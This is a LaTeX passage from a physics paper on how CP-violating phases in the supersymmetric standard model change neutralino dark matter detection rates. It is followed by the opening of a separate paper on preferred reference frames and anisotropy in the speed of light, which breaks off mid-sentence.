0 & |\m2| e^{i\xi_2} & M_z\cos\theta_W\cos\beta e^{-i \chi_1}& -M_z\cos\theta_W\sin\beta e^{-i\chi_2} \cr
-M_z\sin\theta_W\cos\beta e^{-i \chi_1} & M_z\cos\theta_W\cos\beta e^{-i\chi_2} & 0 &
-|\mu| e^{i\theta_{\mu}}\cr
M_z\sin\theta_W\sin\beta e^{-i \chi_1} & -M_z\cos\theta_W\sin\beta e^{-i \chi_2}
& -|\mu| e^{i\theta_{\mu}} & 0}
\right)
\end{equation}
Here $M_Z$ is the Z boson mass, $\theta_W$ is the weak angle,
$\tan\beta$=$|v_2/v_1|$ where $v_i=<H_i>$ = $|v_i|$
$e^{i\chi_i}$ (i=1,2) where $H_2$ is the Higgs that
gives mass to
the up quarks and $H_1$ is the Higgs that gives mass to
the down quarks and the leptons, $\mu$ is the Higgs
mixing parameter (i.e. it appears in the superpotential as the
term $\mu H_1H_2$),
$\m1$ and $\m2$ are the masses of the U(1) and SU(2) gauginos at
the electro-weak scale with $\xi_1$ and $\xi_2$ being their phases.
The
neutralino mass matrix of Eq.(1) contains several phases.
However, it can be shown \cite{in2}
that the eigenvalues
and the eigenvectors of the neutralino mass matrix
depend on only two combinations: $\theta$=
$\frac{\xi_1+\xi_2}{2}$+$\chi_1$ +$\chi_2$+$\theta_{\mu}$
and $\Delta \xi$=$(\xi_1-\xi_2)$.
The neutralino matrix can be
diagonalized by a unitary matrix X such that
\begin{equation}
X^T M_{\chi^0} X={\rm diag}(\mx1, \mx2, \mx3, \mx4)
\end{equation}
We shall denote the LSP by the index 0 so that
\begin{equation}
\chi^0=X_{10}^*\tilde B+X_{20}^*\tilde W+ X_{30}^*\tilde H_1+
X_{40}^*\tilde H_2
\end{equation}
The basic interactions that enter in the scattering of the LSP from
nuclei are the neutralino-squark-quark interactions in the s channel
and the neutralino-neutralino-Z(Higgs) interactions in the cross channel.
The squark mass matrix $M_{\tilde{q}}^2$
involves both the phases of $\mu$ and
of the trilinear couplings as given below
\begin{equation}
\left(\matrix{M_{\tilde{Q}}^2+m{_q}^2+M_{z}^2(\frac{1}{2}-Q_q
\sin^2\theta_W)\cos2\beta & m_q(A_{q}^{*}m_0-\mu R_q) \cr
m_q(A_{q} m_0-\mu^{*} R_q) & M_{\tilde{U}
}^2+m{_q}^2+M_{z}^2 Q_q \sin^2\theta_W \cos2\beta}
\right)
\end{equation}
Here $Q_u=2/3(-1/3)$ for q=u(d) and $R_q=v_1/v_2^* (v_2/v_1^*)$
for q=u(d),
and $m_q$ is the quark mass.
The squark matrix is diagonalized by $D_{qij}$ such that
\begin{equation}
D_{q}^\dagger M_{\tilde{q}}^2 D_q={\rm diag}(M_{\tilde{q}1}^2,
M_{\tilde{q}2}^2)
\end{equation}
As mentioned in the introduction the relative velocities of the LSP
hitting the targets are small, and consequently we can approximate
the effective
interaction governing the neutralino-quark scattering by an
effective four-fermi interaction. We give now the result of our
analysis including all the relevant CP violating effects in a
softly broken MSSM. The effective four fermi
interaction is given by
\begin{eqnarray}
{\cal L}_{eff}=\bar{\chi}\gamma_{\mu} \gamma_5 \chi \bar{q}
\gamma^{\mu} (A P_L +B P_R) q+ C\bar{\chi}\chi m_q \bar{q} q
+D \bar{\chi}\gamma_5\chi m_q \bar{q}\gamma_5 q\nonumber\\
+E\bar{\chi}i\gamma_5\chi m_q \bar{q} q
+F\bar{\chi}\chi m_q \bar{q}i\gamma_5 q
\end{eqnarray}
where our choice of the metric is $\eta_{\mu\nu}=(1,-1,-1,-1)$.
The deduction of Eq.(6) starting from the microscopic supergravity
Lagrangian is given in Appendix A. Here we give the results.
The first two terms ($A$, $B$) are spin-dependent interactions and arise
from the $Z$ boson and the sfermion exchanges. For these our analysis gives
\begin{equation}
A=\frac{g^2}{4 M^2_W}[|X_{30}|^2-|X_{40}|^2][T_{3q}-
e_q sin^2\theta_W]
-\frac{|C_{qR}|^2}{4(M^2_{\tilde{q1}}-M^2_{\chi})}
-\frac{|C^{'}_{qR}|^2}{4(M^2_{\tilde{q2}}-M^2_{\chi})}
\end{equation}
\begin{equation}
B=-\frac{g^2}{4 M^2_W}[|X_{30}|^2-|X_{40}|^2]
e_q sin^2\theta_W +
\frac{|C_{qL}|^2}{4(M^2_{\tilde{q1}}-M^2_{\chi})}
+\frac{|C^{'}_{qL}|^2}{4(M^2_{\tilde{q2}}-M^2_{\chi})}
\end{equation}
where
\begin{equation}
C_{qL}=\sqrt{2} (\alpha_{q0} D_{q11} -\gamma_{q0} D_{q21})
\end{equation}
\begin{equation}
C_{qR}=\sqrt{2} (\beta_{q0} D_{q11} -\delta_{q0} D_{q21})
\end{equation}
\begin{equation}
C^{'}_{qL}=\sqrt{2} (\alpha_{q0} D_{q12} -\gamma_{q0} D_{q22})
\end{equation}
\begin{equation}
C^{'}_{qR}=\sqrt{2} (\beta_{q0} D_{q12} -\delta_{q0} D_{q22})
\end{equation}
and where $\alpha$, $\beta$, $\gamma$, and $\delta$ are given by\cite{falk4}
\begin{equation}
\alpha_{u(d)j}=\frac{g m_{u(d)}X_{4(3)j}}{2 m_W\sin\beta(\cos\beta)}
\end{equation}
\begin{equation}
\beta_{u(d)j}=eQ_{u(d)j}X'^{*}_{1j}+\frac{g}{cos\theta_W}X'^{*}_{2j}
(T_{3u(d)}-Q_{u(d)}\sin^2\theta_W)
\end{equation}
\begin{equation}
\gamma_{u(d)j}=eQ_{u(d)j}X'_{1j}-
\frac{gQ_{u(d)}\sin^2\theta_W}{cos\theta_W}X'_{2j}
\end{equation}
\begin{equation}
\delta_{u(d)j}= \frac{- g m_{u(d)}X^*_{4(3)j}}{2 m_W\sin\beta(\cos\beta)}
\end{equation}
Here g is the $SU(2)_L$ gauge coupling and
\begin{equation}
X'_{1j}=X_{1j}\cos\theta_W+X_{2j}\sin\theta_W
\end{equation}
\begin{equation}
X'_{2j}=-X_{1j}\sin\theta_W+X_{2j}\cos\theta_W
\end{equation}
The effect of the CP violating phases enter via the neutralino
eigen-vector components $X_{ij}$
and via the matrix $D_{qij}$
that diagonalizes the squark mass matrix.
The C term in Eq.(6) represents the scalar interaction which gives rise to
coherent scattering.. It receives contributions from the sfermion
exchange, from the CP even light Higgs ($h^0$) exchange, and from the
CP even heavy Higgs ($H^0$) exchange. Thus
\begin{equation}
C=C_{\tilde{f}}+C_{h^0}+C_{H^0}
\end{equation}
where
\begin{equation}
C_{\tilde{f}}(u,d)= -\frac{1}{4m_q}\frac{1}
{M^2_{\tilde{q1}}-M^2_{\chi}} Re[C_{qL}C^{*}_{qR}]
-\frac{1}{4m_q}\frac{1}
{M^2_{\tilde{q2}}-M^2_{\chi}} Re[C^{'}_{qL}C^{'*}_{qR}]
\end{equation}
\begin{eqnarray}
C_{h^0}(u,d)=-(+)\frac{g^2}{4 M_W M^2_{h^0}}
\frac{\cos\alpha(sin\alpha)}{\sin\beta(cos\beta)} Re\sigma
\end{eqnarray}
\begin{eqnarray}
C_{H^0}(u,d)=
\frac{g^2}{4 M_W M^2_{H^0}}
\frac{\sin\alpha(cos\alpha)}{\sin\beta(cos\beta)} Re \rho
\end{eqnarray}
Here $\alpha$ is the Higgs mixing angle,
(u,d) indicate the flavor of the quark
involved in the scattering, and $\sigma$ and $\rho$ are
defined by
\begin{equation}
\sigma=
X_{40}^*(X_{20}^*-\tan\theta_W X_{10}^*)\cos\alpha
+X_{30}^*(X_{20}^*-\tan\theta_W X_{10}^*)\sin\alpha
\end{equation}
\begin{equation}
\rho=
- X_{40}^*(X_{20}^*-\tan\theta_W X_{10}^*)\sin\alpha
+X_{30}^*(X_{20}^*-\tan\theta_W X_{10}^*)\cos\alpha
\end{equation}
The last three terms D,E and F in eq.(6) are given by
\begin{equation}
D(u,d)= C_{\tilde{f}}(u,d)
+\frac{g^2}{4M_W}\frac{cot\beta(tan\beta)}{m_{A_0}^2}Re\omega
\end{equation}
\begin{eqnarray}
E(u,d)=T_{\tilde{f}}(u,d)+
\frac{g^2}{4M_W} [
-(+) \frac{cos\alpha(sin\alpha)}
{\sin\beta(cos\beta)} \frac{Im\sigma} {m_{h^0}^2}
+\frac{sin\alpha(cos\alpha)}
{\sin\beta(cos\beta)}\frac{Im\rho}{m_{H^0}^2} ]
\end{eqnarray}
\begin{eqnarray}
F(u,d)=T_{\tilde{f}}(u,d)
+\frac{g^2}{4M_W} \frac{cot\beta(tan\beta)}{m_{A^0}^2}
Im\omega
\end{eqnarray}
where $A^0$ is the CP odd Higgs and where $\omega$ is defined by
\begin{equation}
\omega=
-X_{40}^*(X_{20}^*-\tan\theta_W X_{10}^*)\cos\beta
+X_{30}^*(X_{20}^*-\tan\theta_W X_{10}^*)\sin\beta
\end{equation}
and
\begin{equation}
T_{\tilde{f}}(q)= \frac{1}{4m_q}\frac{1}
{M^2_{\tilde{q1}}-M^2_{\chi}} Im[C_{qL}C^{*}_{qR}]
+\frac{1}{4m_q}\frac{1}
{M^2_{\tilde{q2}}-M^2_{\chi}} Im[C^{'}_{qL}C^{'*}_{qR}]
\end{equation}
In the limit of vanishing CP violating phases our
results of A, B and C
limit to the result of reference\cite{jungman}.
In that limit we have a difference
of a minus sign in the Z-exchange terms of Ref. \cite{drees} in
their equations (2a, 2b, A1). Further, in the same limit of
vanishing CP violating phases our results go to those of Ref. \cite{flores}
with an overall minus sign difference in the three exchange terms, i.e.,
the Z, the sfermions and the higgs terms.
(see Appendix B for details).
To compare our results to those of
reference\cite{falk3} we note that the analysis of reference\cite{falk3}
was limited to
the case of two CP violating phases and it gave the analytic results
for only some of the co-efficients in the low energy expansion of
Eq.(6).
The terms E and F given by
Eqs.(26) and (27) are new and vanish in the limit when CP is conserved.
The term D given by Eq.(25) is non-vanishing in the limit when CP
phases vanish. However, this term is mostly ignored in the literature
as its contribution is suppressed because of the small velocity
of the relic neutralinos. In fact the contributions of D,E and F are
expected to be relatively small and we ignore them in our numerical
analysis here.
For the computation of the event rates from nuclear
targets in the direct detection of dark matter we follow the
techniques discussed in Ref.\cite{arno}
and we refer the reader to it for details.
We give now the numerical estimates of the CP violating
effects on event rates. First we consider the case when
the EDM constraint is not imposed. In Fig.1 we exhibit the ratio
$R/R(0)$ for Ge where R is the event rate with CP violation arising from
a non-vanishing $\theta_{\mu}$ and R(0) is the
event rate in the absence of CP violation. The figure illustrates that
the effect of the CP violating phase can be very large. In fact, as can be
seen from Fig.1 the variations can be as large as 2-3 orders of
magnitude. However, as noted above the EDM constraint was not imposed
here.
Next we give the analysis with inclusion of
the EDM constraints.
For this purpose we work in the parameter space
where the cosmological relic density constraint and the EDM
constraints are simultaneously satisfied and we compute the
ratio R/R(0) for Ge in this region. Specifically the satisfaction of the relic
density and the EDM constraints is achieved by varying the
parameters of the theory. The satisfaction of the EDM
constraint is achieved through the cancellation mechanism discussed
in Refs.\cite{in1,in2}. The result
of this analysis is exhibited in Fig.2. Here we find the range of
variation of R/R(0) with $\theta_{\mu}$ to be much smaller although
still substantial. Thus from Fig.2 we find that
the variation of R/R(0) has a range of up to a factor of 2 over
most of the allowed parameter space satisfying the relic density and
the EDM constraints in the regions of the parameter investigated.
This variation is substantially smaller than the one observed in Fig.1
when the EDM constraints were not imposed.
In conclusion, we have given in this paper the first complete
analytic analysis of the effects of CP violating phases on the
event rates in the direct detection of dark matter within the
framework of MSSM with no generational mixing. We find that the
CP violating effects can generate variations in the event rates
up to 2-3 orders of magnitude. However, with the inclusion of the
EDM constraints the effects are much reduced although still
significant in that
the variations could be up to a factor $\sim 2$
as seen from the analysis over the region of the parameter
space investigated. Of course the parameter space of MSSM
is quite large and there may exist other regions of the parameter
space of MSSM where the CP violating effects on event rates
consistent with the EDM constraints are even larger.
\noindent
This research was supported in part by NSF grant
PHY-96020274.
\begin{figure}
\begin{center}
\includegraphics[angle=0,width=2.5in]{fig1.ps}
\caption{Plot of R/R(0) for Ge as a function of the CP violating phase
$\theta_{\mu}$ in the MSSM case when tan$\beta$=2, $m_0$=100 GeV,
$|A_0|$=1 for the cases when the gluino mass is 500 GeV
(solid curve), 600 GeV (dotted curve), and 700 GeV (dashed
curve)}
\label{fig1}
\end{center}
\end{figure}
\begin{figure}
\begin{center}
\includegraphics[angle=0,width=2.5in]{fig2.ps}
\caption{Plot of R/R(0) for Ge as a function of the CP violating phase
$\theta_{\mu}$ for the parameter space discussed in the
text. The parameter space spans regions satisfying
the relic density and the EDM constraints obtained by varying other
parameters in the theory.
}
\label{fig2}
\end{center}
\end{figure}
\newpage
\section{Appendix A}
In this appendix we give a derivation of the four fermi
neutralino-quark effective
Lagrangian with CP violating phases given in the text.
\subsection{squark exchange terms}
From the microscopic Lagrangian of quark-squark-neutralino\cite{in1}
\begin{equation}
{-\cal L}=\bar{q}[C_{qL}P_L+C_{qR}P_R]\chi\tilde{q_1}+
\bar{q}[C^{'}_{qL}P_L+C^{'}_{qR}P_R]\chi\tilde{q_2}+H.c.
\end{equation}
the effective lagrangian for $q-\chi$ scattering via the
exchange of squarks is given by
\begin{eqnarray}
{\cal L}_{eff}=\frac{1}{M^{2}_{\tilde{q_1}}-M^{2}_{\chi}}
\bar{\chi}[C^{*}_{qL}P_R+C^{*}_{qR}P_L]q\bar{q}[C_{qL}P_L+C_{qR}P_R]
\chi\nonumber\\
+\frac{1}{M^{2}_{\tilde{q_2}}-M^{2}_{\chi}}
\bar{\chi}[C^{*'}_{qL}P_R+C^{*'}_{qR}P_L]q
\bar{q}[C^{'}_{qL}P_L+C^{'}_{qR}P_R]
\chi
\end{eqnarray}
We use Fierz reordering to write the Lagrangian in terms
of the combinations
$\bar{\chi}\chi\bar{q}q$, $\bar{\chi}\gamma_5\chi\bar{q}\gamma_5q$,
$\bar{\chi}\gamma^{\mu}\gamma_5\chi\bar{q}\gamma_{\mu}q$,$
\bar{\chi}\gamma^{\mu}\gamma_5\chi\bar{q}\gamma_{\mu}\gamma_5q$,
$\bar{\chi}\gamma_5\chi\bar{q}q$ and $\bar{\chi}\chi\bar{q}\gamma_5q$.
For this purpose, we define the 16 matrices
\begin{equation}
\Gamma^A=\{1,\gamma^0,i\gamma^i,i\gamma^0\gamma_5,
\gamma^i\gamma_5,\gamma_5,i\sigma^{0i},\sigma^{ij}\}: ~~i,j=1-3
\end{equation}
with the normalization
\begin{equation}
tr(\Gamma^A\Gamma^B)=4\delta^{AB}
\end{equation}
The Fierz rearrangement formula with the above definitions and
normalizations is
\begin{equation}
(\bar{u_1}\Gamma^Au_2)(\bar{u_3}\Gamma^Bu_4)=\sum_{C,D}F^{AB}_{CD}
(\bar{u_1}\Gamma^Cu_4)(\bar{u_3}\Gamma^Du_2)
\end{equation}
where $u_j$ are Dirac or Majorana spinors and
\begin{equation}
F^{AB}_{CD}=
-(+)\frac{1}{16}tr(\Gamma^C\Gamma^A\Gamma^D\Gamma^B)
\end{equation}
and where the +ve sign is for commuting u spinors and the -ve sign is for
the anticommuting u fields. In our case we have to use the -ve sign since
we are dealing with quantum Majorana and Dirac fields in the Lagrangian.
We give below the Fierz rearrangement of the four combinations that appear
in Eq.(31) above:
\begin{eqnarray}
\bar{\chi}q\bar{q}\chi=-\frac{1}{4}\bar{\chi}\chi\bar{q}q-\frac{1}{4}
\bar{\chi}\gamma_5\chi\bar{q}\gamma_5q+\frac{1}{4}\bar{\chi}\gamma^{\mu}
\gamma_5\chi\bar{q}\gamma_{\mu}\gamma_5q\nonumber\\
\bar{\chi}\gamma_5
q\bar{q}\chi=\frac{1}{4}\bar{\chi}\gamma^{\mu}\gamma_5
\chi\bar{q}\gamma_{\mu}
q-\frac{1}{4}
\bar{\chi}\chi\bar{q}\gamma_5q-\frac{1}{4}\bar{\chi}\gamma_5
\chi\bar{q}q\nonumber\\
\bar{\chi}
q\bar{q}\gamma_5
\chi=-\frac{1}{4}\bar{\chi}\gamma^{\mu}\gamma_5
\chi\bar{q}\gamma_{\mu}
q-\frac{1}{4}
\bar{\chi}\chi\bar{q}\gamma_5q-\frac{1}{4}\bar{\chi}\gamma_5
\chi\bar{q}q\nonumber\\
\bar{\chi}\gamma_5
q\bar{q}\gamma_5
\chi=-\frac{1}{4}\bar{\chi}\chi\bar{q}q-\frac{1}{4}
\bar{\chi}\gamma_5\chi\bar{q}\gamma_5q-\frac{1}{4}\bar{\chi}\gamma^{\mu}
\gamma_5\chi\bar{q}\gamma_{\mu}\gamma_5q
\end{eqnarray}
In the above we have used the metric $\eta_{\mu\nu}=(1,-1,-1,-1)$,
and we also used the fact that $\chi$ is a
Majorana
field so that $\bar{\chi}\gamma_{\mu}\chi=0$
and $\bar{\chi}\sigma_{\mu\nu}\chi=0$.
By rearranging the terms to be in the form of ${\cal L}_{eff}$
of Eq.(6) we can find out
directly
the squark contributions to $A, B, C, D, E$ and $F$ terms as given in
the text of the paper.
\subsection{Z boson exchange}
From the $q-Z-q$ and $\chi-Z-\chi$ interactions
in Eqs. (c62) and (c87a) of Ref.\cite{kane}, we obtain the
following effective Lagrangian for the $q-\chi$ scattering via Z-exchange:
\begin{equation}
{\cal L}_{eff}=\frac{g^2}{4M^2_z \cos^2\theta_W}
[|X_{30}|^2-|X_{40}|^2]\bar{q}\gamma^{\mu}[d_{qL}P_L+
d_{qR}P_R]q\bar{\chi}\gamma_{\mu}\gamma_5\chi
\end{equation}
where $d_{qL}=T_{3L}-e_q\sin^2\theta_W$ and $d_{qR}=-e_q\sin^2\theta_W$.
From Eq.(37) we can read off the
contribution to A and B from the Z exchange. These contributions are
given in Eqs.(7) and (8).
\subsection{Higgs exchange terms}
Higgs exchange will contribute to $C, D, E$ and $F$ terms. From the
interaction Lagrangian of ${\cal L}_{H\chi\chi}$ and
${\cal L}_{Hq\bar{q}}$
in Eqs. (4.47) and (4.10) respectively of Ref.\cite{haber},
one can get the effective Lagrangian for $q-\chi$ scattering via $h^0$,
$H^0$ and $A^0$ exchanges. In our formalism we use $h^0$, $H^0$ and
$A^0$ for the light, heavy and CP-odd neutral higgs.
There are six contributions: three higgs exchange terms
for the up flavor and three for the down flavor. To illustrate we
choose the up quark scattering with $\chi$ via the
exchange of the heavy higgs $H^0$ ($H^0_1$ in the notation of
Ref.\cite{haber}):
\begin{equation}
{\cal L}_{eff}=\frac{1}{m^2_{H0}}(J^1_{H0}+J^2_{H0})I^u_{H0}
\end{equation}
where
\begin{eqnarray}
J^1_{H0}=-\frac{g}{2}\cos\alpha\bar{\chi}
(Q^{"*}_{00}P_L+Q^{"}_{00}P_R)\chi\nonumber\\
J^2_{H0}=\frac{g}{2}\sin\alpha\bar{\chi}
(S^{"*}_{00}P_L+S^{"}_{00}P_R)\chi\nonumber\\
I^u_{H0}=-\frac{gm_u\sin\alpha}{2M_w \sin\beta}\bar{u}u
\end{eqnarray}
where $Q_{00}^{''*}, S_{00}^{''*}$ are as defined in Ref.\cite{haber}.
Defining $\rho$ by
\begin{equation}
\rho=Q^{"}_{00}\cos\alpha-S^{"}_{00}\sin\alpha
\end{equation}
we get the $H^0$ contribution to ${\cal L}_{eff}$:
\begin{eqnarray}
{\cal L}_{eff}=\frac{g^2m_u\sin\alpha}{4M_W m^2_{H0}\sin\beta}Re(\rho)
\bar{\chi}\chi\bar{u}u\nonumber\\
+\frac{ig^2m_u\sin\alpha}{4M_Wm^2_{H0}\sin\beta}Im(\rho)
\bar{\chi}\gamma_5\chi\bar{u}u
\end{eqnarray}
From Eq.(41) we can read off directly the contributions
$C_{H0}(u) $ and $E_{H0}(u)$ as given by Eqs.(22) and (26).
\newpage
\section{Appendix B}
Here we compare our results with those of Ref.\cite{flores}
which is in the limit of no CP violation, no sfermion mixing
and no heavy Higgs. In the limit of no CP violation and no sfermion
mixing
$C_L, C_L', C_R, C_R'$ given by Eqs.(9-12) in the text reduce to the
following:
\begin{eqnarray}
C_L=\sqrt{2} \alpha_{q0},~~C_L'=-\sqrt 2 \gamma_{q0}\nonumber\\
C_R=\sqrt {2} \beta_{q0}, ~~C_R'=-\sqrt{2} \delta_{q0}
\end{eqnarray}
To express the above in the notation of Ref.\cite{flores}
we set $X_{10}^*=\beta$, $X_{20}^*=\alpha$, $X_{30}^*=\delta$,
and $X_{40}^*=\gamma$ keeping in mind that the $H_1$ and $H_2$ of
Ref.\cite{flores} are defined oppositely to our notation.
Using the above along with Eqs.(13-16) we find for
$T_3=\frac{1}{2}(-\frac{1}{2})$
\begin{eqnarray}
|C_L|^2=\frac{m_u^2(m_d^2)\gamma^2(\delta^2)}{\nu_1^2(\nu_2^2)}\nonumber\\
|C_L'|^2=2(g_1\frac{1}{2}Y_R\beta)^2\nonumber\\
|C_R|^2=2(\alpha g_2 T_{3}+\beta g_1\frac{Y_L}{2})^2\nonumber\\
|C_R'|^2=\frac{m_u^2(m_d^2)\gamma^2(\delta^2)}{\nu_1^2(\nu_2^2)}
\end{eqnarray}
where $Y_L$ is the hypercharge,
$\nu_1=<H_1>$, and $\nu_2=<H_2>$ and where $H_1$ and $H_2$ are in
the notation of Ref.\cite{flores}.
Further using the identity
\begin{equation}
\frac{g_2^2}{cos^2\theta_W}(T_{3}-e_qsin^2\theta_W)=
-(g_1 sin\theta_W+g_2 cos\theta_W)(\frac{1}{2}Y_Lg_1 sin\theta_W-
T_3g_2 cos\theta_W)
\end{equation}
where the left hand side of Eq.(44) is written in the
form used in Ref.\cite{flores},
we can express A and B in the limit of no CP violation and
no sfermion mixing as follows: for $T_3=\frac{1}{2}(-\frac{1}{2})$
\begin{eqnarray}
A=\frac{(\gamma^2-\delta^2)}{4M_Z^2}
(g_1 sin\theta_W+g_2 cos\theta_W)(\frac{1}{2}Y_L g_1 sin\theta_W-
T_3g_2 cos\theta_W)\nonumber\\
-\frac{(\alpha g_2 T_{3}+\beta g_1\frac{Y_L}{2})^2}
{2(M_{\tilde q_L}^2-M_{\chi}^2)}
-\frac{m_u^2(m_d^2)\gamma^2(\delta^2)}
{4(M_{\tilde q_R}^2-M_{\chi}^2)\nu_1^2(\nu_2^2)}
\end{eqnarray}
\begin{eqnarray}
B=\frac{(\gamma^2-\delta^2)}{4M_Z^2}
(g_1 sin\theta_W+g_2 cos\theta_W)(\frac{1}{2}Y_L g_1 sin\theta_W-
T_3g_2 cos\theta_W)\nonumber\\
+\frac{(g_1\frac{1}{2}Y_R\beta)^2}{2(M_{\tilde q_R}^2-M_{\chi}^2)}
+\frac{m_u^2(m_d^2)\gamma^2(\delta^2)}
{4(M_{\tilde q_R}^2-M_{\chi}^2)\nu_1^2(\nu_2^2)}
\end{eqnarray}
To compare our $C$ term with that of Ref.\cite{flores} we
again go to the limit of vanishing CP violating phases,
assume no sfermion mixing, and in addition ignore
the heavy Higgs exchange contribution (i.e., the term $C_{H^0}$
of Eq.(22) in the text).
Then using similar notational changes as above we find that
our $C$ under the approximations made in Ref.\cite{flores}
is given by
\begin{eqnarray}
C=\frac{g_2^2}{4M_W m_{h^0}^2}\frac{(-cos\alpha)(sin\alpha)}
{(sin\beta)(cos\beta)}(\alpha-\beta tan\theta_W)(\gamma cos\alpha
+\delta sin\alpha)\nonumber\\
-\frac{g_2}{4M_W}(\frac{\alpha g_2 T_{3}+\beta g_1\frac{Y_L}{2}}
{M_{\tilde q_L}^2-M_{\chi}^2}-\frac{\beta g_1\frac{Y_R}{2}}
{M_{\tilde q_R}^2-M_{\chi}^2})
\frac{\gamma (\delta)}{sin\beta(cos\beta)} ;~~T_3=\frac{1}{2}(-\frac{1}{2})
\end{eqnarray}
Comparing our results for A,B and C with those of Ref.\cite{flores}
we find that our Z, sfermion and Higgs exchange terms have an
overall minus sign relative to those of Ref.\cite{flores}.
| 2024-02-18T23:40:13.246Z | 1999-06-23T23:24:24.000Z | algebraic_stack_train_0000 | 1,707 | 4,770 |
|
proofpile-arXiv_065-8380 | \section{Introduction}
\label{s1}
The anisotropy in the
microwave background \cite{Smo77} has suggested the existence
of a preferred frame $\Sigma$ which sees an isotropic background and
of a corresponding anisotropy in the
one-way velocity of light, when measured in our system $S$, which
moves with
respect to $\Sigma$ at the velocity of about 377 km/s.
Possible consequences have been exploited from the theoretical point of
view \cite{Rob49} \cite{Man77};
many important and precise experiments have then been
carried out with the
purpose of detecting this anisotropy. No variation was
observed at the level of $3\times10^{-8}$
\cite{Tur64}, $2 \times 10^{-13}$ \cite{Bri79},
$3\times 10^{-9}$ \cite{Rii88},
$2 \times 10^{-15}$\cite{Hil90}, $3.5\times 10^{-7}$ \cite{Kri90},
$5\times10^{-9}$ \cite{Wol97}.
Our motion with respect
to $\Sigma$ is a composition of the motions of the
Earth in the solar system, of this system in our galaxy, of our galaxy
inside a group of galaxies,... .
The problem which arises
is a very old one: may we perform, on or near the
Earth, experiments to make evident
our motion with respect to the preferred frame?
Historically, this question has been formulated in two steps,
connected with the relativity principle and the equivalence principle,
respectively.
The first step is due to Galilei,
who excluded the possibility of performing,
inside a ship cabin, experiments
having the purpose of measuring the ship
velocity with respect to the mainland.
To compare the background radiation
case with the Galilei proposal,
if the Sun light entering inside the cabin through a port-hole
is analysed, its
black-body radiation spectrum would appear different from the one
observed on the mainland.
The second step was introduced by Einstein
through the equivalence principle \cite{Wil93}:
{\it At every space-time point in an arbitrary
gravitational field it is
possible to choose a "locally inertial coordinate system"
such that, within a
sufficiently small region of the point in question,
the laws of nature take the same form
as in unaccelerated Cartesian coordinate
systems in absence of
gravitation}.\cite{Wei72}
As a consequence, experiments inside a freely falling space cabin
exhibit its relative motion only in the presence of inhomogeneities
in the gravitational field.
In the following section
we discuss the quoted experiments according to the two steps
outlined above.
In section 2 we analyse the linear transformations due to
Robertson and to Mansouri and Sexl, which generalize the Lorentz
one and which have stimulated the experiments we are speaking of.
We conclude that, due to the definitional role of light velocity,
the linear transformations between inertial frames must have
Lorentz form.
In section 3 we analyse the possibility of locally detecting
anisotropies in the light velocity in the case of general relativity.
\section{The preferred frame}
The linear transformations between inertial frames
have been analysed by very many authors (a list of them is given
in ref. \cite{Pre94})
under hypotheses which include the requirement that they form a group,
but do not include, a priori,
the invariance of the light velocity. They conclude that these (Lorentz)
transformations must be characterized by a velocity
$c$, infinite in the Galilei limit, which, in principle,
may take different absolute values in the different
astronomical directions.
Robertson \cite{Rob49} and
Mansouri and Sexl \cite{Man77}
have analysed the linear transformation between
the preferred reference frame $\Sigma$
and another inertial frame $S$ which is moving with respect to it.
Robertson derives the following general linear transformation between
the preferred system $\Sigma(x',y',z',t')$
and the frame $S(x,y,z,t)$, which
moves along the $x$-direction which connects the respective origins $\Omega$
and $O$:
\begin{equation}
x'=a_{1}x+va_{0}t,~~~~y'=a_{2}y,~~~~z'=a_{2}z,~~~~t'=\frac{va_{1}}{c^{2}}x
+a_{0}t,
\end{equation}
where $a_{0}$, $a_{1}$ and $a_{2}$ may depend on $v$.
This transformation, which is expressed in terms of the parameter $v$
and which reduces to the identity when $v=0$,
is derived under the hypotheses that:
$i)$ space is euclidean
for both $\Sigma$ and $S$;
$ii)$ in
$\Sigma$ all clocks are synchronized and light moves
with a speed $c$ which
is independent of direction and position;
$iii)$ the one-way speed of
light in $S$ in planes perpendicular to the motion of $S$
is orientation-independent.
Notice that $O$ moves with respect to $\Sigma$ with
velocity $v$, while $\Omega$ moves with respect to $S$ with
velocity $\tilde{v}\equiv v a_{0}/a_{1}$ ; analogously, light,
which is seen
by $\Sigma$ to move according to the law $x'=ct'$, is seen by
$S$ to move with velocity
$\tilde{c}\equiv c a_{0}/a_{1}$, independently of
the direction of $c$. If $c$ is the maximum speed in $\Sigma$, $\tilde{c}$
is the maximum speed in $S$; moreover $\tilde{v}/\tilde{c}=v/c$.
In terms of these
true velocities, equations (1) take the form
\begin{equation}
t'=a_{0}\left(t+\frac{\tilde{v}}{\tilde{c}^{2}}x\right),~
x'=a_{1}\left(x+\tilde{v}t\right),~
y'=a_{2}y,~
z'=a_{2}z.\nonumber\\
\end{equation}
The transformation is then the product of a Lorentz transformation and
a scale transformation; the latter may be re-absorbed by a redefinition of the
units.
If the length standard is estabilished, in any frame,
by giving an assigned value to the speed of
light, then the light velocities in $\Sigma$ and $S$ are equal, $x$
is scaled by $a_{0}/a_{1}$ and the transformation between the $(x,t)$
variables takes a familiar form.
The fact that this transformation implies different
light speeds in different directions in the $(x,y)$ plane is, a priori,
admissible.
This case is typical of a tetragonal crystal; the light speeds may be different
in the $x$ and in the $y$ directions, when measured with external
standards; a suitable internal scaling of the $y$ variable would of
course give the same value to the internal velocities, but the time
required for the light to travel the crystal in the $y$-direction would
be different from the one seen by an external observer.
In this case the attribution of different light speeds for different
directions is physically justified. But if we have no such a justification,
the thing to do is to apply the Poincar\'e simplicity criterion and to
attribute the same value to the light speed in different directions.
Mansouri and Sexl \cite{Man77}
analyse the linear
transformation from a preferred frame $\Sigma (X,T)$ to
another frame
$S (x,t)$, which moves with respect to it at the velocity $v$,
under the hypothesis that
the synchronization is realized by clock transport.
Their analysis is devoted both to one-dimensional transformations and
to three-dimensional ones; we do not discuss here the last case,
but the conclusions will apply as well.
To first order in $v$, the Mansouri and Sexl
one-dimensional transformation takes the form:
\begin{equation}
\left(\begin{array}{c}x\\t\end{array}\right)=
\frac{1}{\sqrt{1-(1-\mu)\frac{v^{2}}{c^{2}}}}\left(\begin{array}{cc}
1 & -v\\ -\frac{(1-\mu) v}{c^{2}}&1
\end{array}\right)
\left(\begin{array}{c}X\\T\end{array}\right),
\end{equation}
where $c$ is the isotropic light speed seen by $\Sigma$
and their quantity $2\alpha$
is substituted here by $-(1-\mu)/c^{2}$ to make explicit the Lorentz and
Galilei limits
($\mu=0$ and $\mu=1$, respectively).
If $\mu\ne 0$, then a particle, which moves with velocity
$u$ in $\Sigma$, appears to $S$ to move according the law:
\begin{equation}
x=\frac{u-v}{1-(1-\mu)\frac{uv}{c^{2}}}t.
\end{equation}
The maximum speed of a frame with respect to $\Sigma$
